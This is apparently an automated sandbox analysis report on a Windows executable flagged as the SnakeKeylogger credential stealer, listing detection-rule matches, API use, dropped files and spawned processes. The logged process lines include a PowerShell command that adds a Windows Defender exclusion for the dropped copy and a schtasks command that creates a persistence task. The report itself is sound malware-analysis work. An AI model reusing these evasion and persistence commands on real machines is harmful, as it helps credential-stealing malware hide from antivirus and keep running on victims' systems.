                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: UOEAjWmusE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: gJdonuKfIrqN.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, DO0t4SpngkX2NaXBd4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, DO0t4SpngkX2NaXBd4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, DO0t4SpngkX2NaXBd4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, DO0t4SpngkX2NaXBd4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, DO0t4SpngkX2NaXBd4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, DO0t4SpngkX2NaXBd4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, CN5yYHyRFbwxLmQByk.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/10@3/3
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeFile created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1360:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF362.tmpJump to behavior
                  Source: UOEAjWmusE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: UOEAjWmusE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3770064855.0000000003CED000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002DBF000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002E63000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002E70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: UOEAjWmusE.exeVirustotal: Detection: 74%
                  Source: UOEAjWmusE.exeReversingLabs: Detection: 78%
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeFile read: C:\Users\user\Desktop\UOEAjWmusE.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
